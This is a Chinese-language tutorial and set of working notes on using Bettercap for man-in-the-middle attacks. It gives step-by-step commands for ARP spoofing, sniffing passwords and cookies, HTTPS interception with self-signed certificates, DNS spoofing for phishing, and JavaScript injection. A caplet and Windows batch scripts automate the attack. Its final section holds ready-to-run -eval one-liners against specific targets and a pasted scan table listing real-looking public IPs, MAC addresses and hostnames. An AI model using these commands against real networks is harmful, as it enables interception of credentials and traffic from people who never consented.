Bettercap（中间人攻击神器）

https://github.com/bettercap/bettercap/releases

 

https://github.com/bettercap/bettercap/releases/download/v2.41.4/bettercap_windows_amd64.zip

安装完运行会提示缺少 libusb.dll

https://github.com/libusb/libusb/releases

需要安装

https://www.winpcap.org/install/

 

第一步：安装Bettercap (选择你喜欢的方式)

• 方式一：直接下载预编译二进制文件 (推荐，最省心)

  访问 Bettercap 的 GitHub Releases 页面 (https://github.com/bettercap/bettercap/releases)，根据你的操作系统下载最新版本的压缩包。解压后即可直接运行。

• 方式二：使用 go install (如果你有Go环境)

  go install http://github.com/bettercap/bettercap@latest# 确保你的 $GOPATH/bin 在系统PATH中

 

• 方式三：包管理器 (如Kali Linux)

  sudo apt updatesudo apt install bettercap -y(注意：包管理器中的版本可能不是最新的)

安装完成后，打开终端，输入 sudo bettercap -version (需要sudo权限来操作网络接口和进行原始套接字操作) 来验证安装。

 

第二步：启动Bettercap与初识交互界面

直接在终端输入 sudo bettercap 即可启动Bettercap的交互式会话。

你会看到一个类似 >> 的提示符。在这里，你可以输入各种命令来控制Bettercap的行为。 常用命令：

help：查看所有可用模块和命令。help <module_name>：查看特定模块的详细帮助信息（如 help net.sniff）。active：显示当前活动模块及其状态。quit 或 exit：退出Bettercap。

 

第三步：核心模块实战演练 (前方高能！)

Bettercap的核心在于其强大的模块。我们来一步步演练最经典的中间人攻击流程：

1. 网络主机发现 (net.recon) - 摸清家底 这个模块用于发现局域网内的存活主机。

   >> net.recon on

   稍等片刻，Bettercap会自动探测网络。你可以使用 net.show 查看发现的主机列表。

   >> net.show

 

1. ARP欺骗 (arp.spoof) - 掌握流量咽喉 ⚔️

   这是实现中间人攻击的关键步骤。它会欺骗目标主机和网关，让它们的流量都经过你的机器。

   Bettercap会持续发送ARP欺骗包。此时，目标主机的流量理论上已经流经你的设备了。

• 设置目标：你可以选择欺骗整个子网，或者指定特定目标。
  # 欺骗特定目标 (例如192.168.1.101)，让其流量经过你>> set arp.spoof.targets 192.168.1.101# 如果想欺骗整个子网（谨慎！），通常需要设置 fullduplex# >> set arp.spoof.fullduplex true# >> set arp.spoof.targets 192.168.1.1 (假设网关是192.168.1.1)

 

• 启动欺骗：>> arp.spoof on

• 流量嗅探 (net.sniff) - 开始“窃听” ️‍♂️ 一旦ARP欺骗成功，就可以开启嗅探器来捕获流经你设备的数据包了。

  >> net.sniff on

  Bettercap会实时显示捕获到的敏感信息，比如HTTP POST请求中的用户名密码、Cookies等。

• 设置过滤器 (可选)：如果你只想关注特定流量，可以使用过滤器。

  # 例如，只抓取80端口的TCP流量

  >> set net.sniff.filter tcp port 80# 清除过滤器>> set net.sniff.filter

• HTTP/HTTPS代理 (http.proxy, https.proxy) - 更深层次的流量操纵 PROXY 这两个模块可以将你的设备变成一个HTTP或HTTPS代理，从而拦截和修改Web流量。

• HTTP代理：>> http.proxy on

  可以配合 set http.proxy.injectjs <JS_URL_or_File> 注入JavaScript代码。

 

• HTTPS代理 (涉及SSL证书)：>> https.proxy on当启用HTTPS代理时，Bettercap会自动生成SSL证书。目标浏览器访问HTTPS网站时会收到证书警告（因为证书是自签名的）。如果用户忽略警告继续访问，你就能解密并查看HTTPS流量了。
• ⚠️ 注意：HTTPS代理的滥用可能导致严重隐私泄露，请负责任地使用。

1. DNS欺骗 (dns.spoof) - 指鹿为马 这个模块可以让你伪造DNS响应，将特定域名解析到你指定的IP地址。常用于钓鱼攻击。

   现在，当被ARP欺骗的目标主机尝试访问被你配置的域名时，会被导向你指定的IP。

• 配置：
  # 将所有域名解析到你的IP (假设你的IP是192.168.1.100)>> set dns.spoof.all true>> set dns.spoof.address 192.168.1.100# 或者只针对特定域名# >> set dns.spoof.domains example.com,*.test.org# >> set dns.spoof.address 192.168.1.100启动：>> dns.spoof on

停止模块：想关闭某个模块，只需将 on 替换为 off，例如 arp.spoof off。

第四步：优雅的Web UI界面

Bettercap还提供了一个非常赞的Web界面，让操作更加直观。 启动API服务和Web服务器：

>> api.rest on>> http.server on# 或者在较新版本中，可能直接有 ui 命令# >> ui

 

然后浏览器访问 http://127.0.0.1 (或者Bettercap提示的端口)，输入默认凭据（通常是 user:pass，首次登录会提示你修改）即可进入Web UI。

在Web UI里，你可以图形化地启动/停止模块、查看目标、配置参数等，非常方便。

 

第五步：Caplets - 自动化你的“骚操作”

Caplet是Bettercap的脚本文件，后缀为 .cap。你可以预先写好一系列命令在caplet文件中，然后让Bettercap加载执行，实现自动化攻击。

例如，创建一个 mitm_basic.cap 文件：

# 开启网络发现net.recon on# 等待几秒让网络发现运行sleep 5# 设置ARP欺骗目标 (根据实际情况修改)set arp.spoof.targets 192.168.1.103, 192.168.1.105arp.spoof on# 开启嗅探net.sniff on# 开启HTTP代理并注入JS (假设你有一个evil.js)# set http.proxy.injectjs /path/to/your/evil.js# http.proxy on启动Bettercap并加载caplet：

sudo bettercap -caplet /path/to/your/mitm_basic.cap

 

进阶玩法与思路 (点到为止)

Bettercap的潜力远不止于此：

• WiFi模块 (wifi.*)：进行WiFi网络的探测、破解（如PMKID攻击）、Deauth攻击等。
• 蓝牙模块 (ble.recon, ble.enum)：发现和枚举附近的蓝牙低功耗设备。
• JavaScript注入 (http.proxy.injectjs)：配合BeEF等框架，实现对目标浏览器的控制。
• 自定义数据包过滤与修改：更细致地操控网络流量。

 

 

使用过程中发现的一些问题

攻击机会丢包或者断网，于是使用sleep 

bettercap.exe -eval "set arp.spoof.targets 6.2.1.1;set arp.spoof.whitelist 6.2.1.9;set arp.spoof.fullduplex true;arp.spoof on;set net.sniff.output 120;net.sniff on;sleep 20;arp.spoof off"

 

 

set arp.spoof.targets 10.0.0.210

set arp.spoof.targets 00-0c-29-39-eb-57

set arp.spoof.whitelist 10.0.0.254

# 启用ARP欺骗模块
arp.spoof on

set arp.spoof.interfaces Ethernet0
set arp.spoof.targets 10.0.0.210,10.0.0.1

netsh interface portproxy add v4tov4 listenaddress=10.0.0.254 listenport=0 connectaddress=10.0.0.1 connectport=0

@echo off
REM 启用 IP 转发
powershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters' -Name 'IPEnableRouter' -Value 1"
netsh interface portproxy add v4tov4 listenaddress=192.168.100.5 listenport=0 connectaddress=192.168.100.1 connectport=0

REM 启动 Bettercap
start /B bettercap -I "以太网" --proxy-module arp_spoof --script "set arp.spoof.targets 10.0.0.210,10.0.0.1 && arp.spoof on && http.proxy on"

REM 保持窗口打开
timeout /t 999999

检查端口转发规则​：

cmd
复制
netsh interface portproxy show all

bettercap.exe -eval "set api.rest.port 8081;set api.rest.address 10.0.0.254;set ui.address 10.0.0.254;set ui.port 10000;ui on;set arp.spoof.targets 10.0.0.210;arp.spoof on;set net.sniff.output c:\aswe2233;net.sniff on"

 

61.250.120.113 │ ac:41:22:c3:29:fd │ DESKTOP-VM7JCPI │ Eclipse Electronic Systems Inc. │ 12 kB │ 0 B │ 16:32:23 │
│ 61.250.120.187 │ 9c:6b:00:76:41:6b │ DESKTOP-QLM9P11 │ ASRock Incorporation │ 12 kB │ 0 B │ 16:32:23 │
│ 61.250.120.243 │ 08:bf:b8:a4:80:da │ DESKTOP-4QOAJM1 │ ASUSTek COMPUTER INC. │ 5.1 kB │ 0 B │ 16:32:23 │

set arp.spoof.targets 6.2.10.3;arp.spoof on;set net.sniff.output c:\2233;net.sniff on

bettercap.exe -eval "set arp.spoof.targets 6.2.1.1;set arp.spoof.whitelist 6.2.1.9;set arp.spoof.fullduplex true;arp.spoof on;set net.sniff.output 120;net.sniff on;sleep 20;arp.spoof off"

set arp.spoof.fullduplex true# >> set arp.spoof.targets 192.168.1.1